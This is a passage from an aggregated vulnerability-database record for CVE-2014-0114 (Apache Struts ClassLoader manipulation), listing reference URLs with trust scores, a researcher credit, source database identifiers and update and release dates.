url:https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-5652

Trust: 0.1

url:https://twitter.com/vmwaresrc

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4322

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-0242

Trust: 0.1

url:http://www.vmware.com/security/advisories

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0050

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0114

Trust: 0.1

url:http://kb.vmware.com/kb/1055

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-4590

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4590

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-4322

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1914

Trust: 0.1

url:http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0242

Trust: 0.1

url:https://www.vmware.com/patchmgr/findpatch.portal

Trust: 0.1

url:https://www.vmware.com/support/policies/lifecycle.html

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-1914

Trust: 0.1

url:http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

Trust: 0.1

url:https://www.vmware.com/support/policies/security_response.html

Trust: 0.1

url:https://www.vmware.com/go/download-vsphere

Trust: 0.1

url:http://www.hp.com/jp/icewall_patchaccess

Trust: 0.1

url:http://h30499.www3.hp.com/t5/hp-security-research-blog/protect-your-struts1-a

Trust: 0.1

sources: BID: 67121 // PACKETSTORM: 126619 // PACKETSTORM: 149050 // PACKETSTORM: 137980 // PACKETSTORM: 154792 // PACKETSTORM: 128873 // PACKETSTORM: 139721 // PACKETSTORM: 128211 // PACKETSTORM: 126811 // JVNDB: JVNDB-2020-006468 // JVNDB: JVNDB-2014-002308 // CNNVD: CNNVD-201404-581 // NVD: CVE-2014-0114

CREDITS

Rene Gielen

Trust: 0.9

sources: BID: 67121 // CNNVD: CNNVD-201404-581

SOURCES

db:VULMONid:CVE-2014-0114
db:BIDid:67121
db:PACKETSTORMid:126619
db:PACKETSTORMid:149050
db:PACKETSTORMid:137980
db:PACKETSTORMid:154792
db:PACKETSTORMid:128873
db:PACKETSTORMid:139721
db:PACKETSTORMid:128211
db:PACKETSTORMid:126811
db:JVNDBid:JVNDB-2020-006468
db:JVNDBid:JVNDB-2014-002308
db:CNNVDid:CNNVD-201404-581
db:NVDid:CVE-2014-0114

LAST UPDATE DATE

2025-08-12T22:07:04.966000+00:00


SOURCES UPDATE DATE

db:VULMONid:CVE-2014-0114date:2023-02-13T00:00:00
db:BIDid:67121date:2019-07-17T07:00:00
db:JVNDBid:JVNDB-2020-006468date:2020-09-01T00:00:00
db:JVNDBid:JVNDB-2014-002308date:2020-09-02T00:00:00
db:CNNVDid:CNNVD-201404-581date:2023-04-14T00:00:00
db:NVDid:CVE-2014-0114date:2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:VULMONid:CVE-2014-0114date:2014-04-30T00:00:00
db:BIDid:67121date:2014-04-29T00:00:00
db:PACKETSTORMid:126619date:2014-05-14T19:25:00
db:PACKETSTORMid:149050date:2018-08-23T17:19:18
db:PACKETSTORMid:137980date:2016-07-20T18:29:00
db:PACKETSTORMid:154792date:2019-10-10T14:43:55
db:PACKETSTORMid:128873date:2014-10-28T18:09:30
db:PACKETSTORMid:139721date:2016-11-15T00:42:48
db:PACKETSTORMid:128211date:2014-09-11T21:08:01
db:PACKETSTORMid:126811date:2014-05-27T16:17:39
db:JVNDBid:JVNDB-2020-006468date:2020-07-09T00:00:00
db:JVNDBid:JVNDB-2014-002308date:2014-05-01T00:00:00
db:CNNVDid:CNNVD-201404-581date:2014-04-30T00:00:00
db:NVDid:CVE-2014-0114date:2014-04-30T10:49:03.973